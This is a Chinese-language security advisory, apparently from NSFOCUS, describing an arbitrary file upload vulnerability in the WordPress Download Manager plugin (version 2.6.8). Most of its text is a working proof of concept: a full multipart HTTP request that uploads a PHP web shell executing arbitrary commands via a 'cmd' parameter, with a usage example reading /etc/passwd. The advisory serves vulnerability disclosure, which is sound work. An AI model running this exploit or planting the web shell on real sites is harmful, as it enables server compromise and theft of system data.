安全研究
安全漏洞
WordPress Download Manager插件任意文件上传漏洞
发布日期:2014-07-11
更新日期:2014-07-15
受影响系统:
WordPress Download Manager描述:
BUGTRAQ ID: 68522
WordPress Download Manager是文件和文档管理插件。
Download Manager 2.6.8及其他版本在实现上存在安全漏洞,这可使远程攻击者上传任意文件。此漏洞源于没有有效过滤用户提供的输入。
<*来源:Claudio Viviani
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Host=10.0.0.67
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding=gzip, deflate
Referer=http://www.example.com/wp-admin/admin.php?page=file-manager/add-new-file
Content-Length=775
Content-Type=multipart/form-data; boundary=---------------------------298331869519772
Cookie=wordpress_b43b255bc018ee66673cd91980a723bf=usernametest%7C1405260002%7C76c1b315f6f8b6e1885921a763036464; wp-settings-1=advImgDetails%3Dshow%26libraryContent%3Dupload%26wpfb_adv_uploader%3D1%26editor%3Dtinymce%26uploader%3D1; wp-settings-time-1=1405085177; bLicense54=true; testpopup=true; __utma=86855576.2039073811.1404413871.1404413871.1404416567.2; __utmz=86855576.1404413871.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_fid=6EEA54B2DFA4150F-06C135149F70F3D9; wp-settings-time-2=1404901595; wp-settings-2=mfold%3Do; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b43b255bc018ee66673cd91980a723bf=usernametest%7C1405260002%7Cf8b04eec8327ab6f17d0b28ce02fe66e
Connection=keep-alive
Pragma=no-cache
Cache-Control=no-cache
POSTDATA =-----------------------------298331869519772
Content-Disposition: form-data; name="name"
shell.php
-----------------------------298331869519772
Content-Disposition: form-data; name="_ajax_nonce"
1cfccd7168
-----------------------------298331869519772
Content-Disposition: form-data; name="action"
file_upload
-----------------------------298331869519772
Content-Disposition: form-data; name="async-upload"; filename="shell.php"
Content-Type: application/octet-stream
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://www.example.com/simple-backdoor.php?cmd=cat+/etc/passwd
建议:
厂商补丁:
WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
https://wordpress.org/plugins/download-manager/
浏览次数:2829
严重程度:0(网友投票)
绿盟科技给您安全的保障
